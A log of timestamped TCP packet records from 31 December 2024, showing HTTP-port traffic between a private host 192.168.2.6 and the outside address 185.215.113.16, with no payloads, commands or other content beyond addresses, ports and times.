Dec 31, 2024 09:48:41.072376013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072386026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072396040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072401047 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072402000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072407007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072421074 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072422981 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072446108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072457075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072468042 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072479010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072489023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072499037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072508097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072518110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072519064 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072529078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072540045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072547913 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072550058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072560072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072570086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072571993 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072580099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072587013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072588921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072598934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072608948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.072619915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.072645903 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.098201036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098213911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098229885 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098239899 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098249912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098259926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098280907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098290920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.098290920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.098342896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.099708080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099719048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099730015 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099745989 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.099746943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099756956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099766970 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099780083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099795103 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.099831104 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.099844933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099895000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099905014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099916935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099926949 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099951029 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.099967003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099977016 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.099992990 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100080967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100090981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100100994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100114107 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100133896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100181103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100191116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100200891 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100210905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100235939 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100260019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100394011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100490093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100501060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100517035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100523949 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100527048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100539923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100548029 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100567102 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100857973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100867033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100882053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100893974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100903034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100903988 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100919962 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.100965023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100975037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100986004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.100996017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101000071 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.101017952 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.101160049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101170063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101181030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101188898 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.101191044 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101206064 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.101963997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101974010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101984024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101994038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.101999998 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.102025032 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.102036953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.102046967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.102056980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.102072001 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.102097988 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.103271008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103283882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103293896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103318930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.103311062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103337049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103348970 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.103353977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103364944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.103398085 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148396969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148422956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148441076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148452044 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148463011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148479939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148483038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148490906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148500919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148511887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148521900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148534060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148535013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148556948 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148608923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148619890 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148629904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148654938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148670912 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148674011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148684978 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148694992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148705959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148725033 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148741007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148750067 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148751020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148761034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148771048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148781061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.148782969 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.148809910 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.223148108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223160982 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223170996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223201036 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.223330975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223341942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223352909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223362923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.223371983 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.223387003 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225065947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225083113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225100040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225109100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225111008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225121021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225136995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225141048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225147963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225157976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225167990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225171089 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225178957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225189924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225198030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225204945 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225220919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225228071 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225251913 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225259066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225270033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225296021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225306034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225306988 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225337029 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225476980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225579023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225588083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225598097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225609064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225615978 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225620985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225630999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225641012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225645065 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225651979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225658894 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225676060 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225747108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225755930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225770950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225781918 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225790977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225796938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225826979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.225893974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225903988 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225914001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.225936890 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.226150990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226161003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226171017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226187944 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.226213932 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.226259947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226269960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226280928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.226300955 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227108955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227119923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227129936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227149963 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227179050 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227199078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227209091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227219105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227240086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227246046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227257013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227267027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227279902 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227297068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227392912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227404118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227421045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227431059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227441072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227463961 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227494955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227494955 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227504969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227515936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227528095 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227545977 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227566957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227576971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227586031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227596045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227613926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227639914 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227710962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227721930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227736950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227746964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227751017 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227756977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227777958 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227848053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227858067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227868080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227881908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227894068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227905035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227907896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227914095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.227929115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.227983952 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228013992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.228023052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228033066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228056908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228056908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.228069067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228108883 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.228127956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228138924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228147984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228158951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.228173018 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.228188992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.348368883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348413944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348426104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348433018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348443985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348453999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348464966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348476887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.348493099 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.348540068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350168943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350217104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350243092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350253105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350260019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350289106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350296974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350307941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350317955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350328922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350356102 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350445032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350454092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350469112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350478888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350488901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350498915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350506067 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350508928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350531101 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350579023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350589991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350600004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350610018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350611925 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350625038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350649118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350666046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350680113 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350682020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350692987 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350703001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350708008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350733995 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.350970030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350980997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.350991011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351018906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.351035118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351046085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351054907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351066113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351068974 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.351075888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351090908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.351118088 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.351119041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.351141930 CET	80	49754	185.215.113.16	192.168.2.6
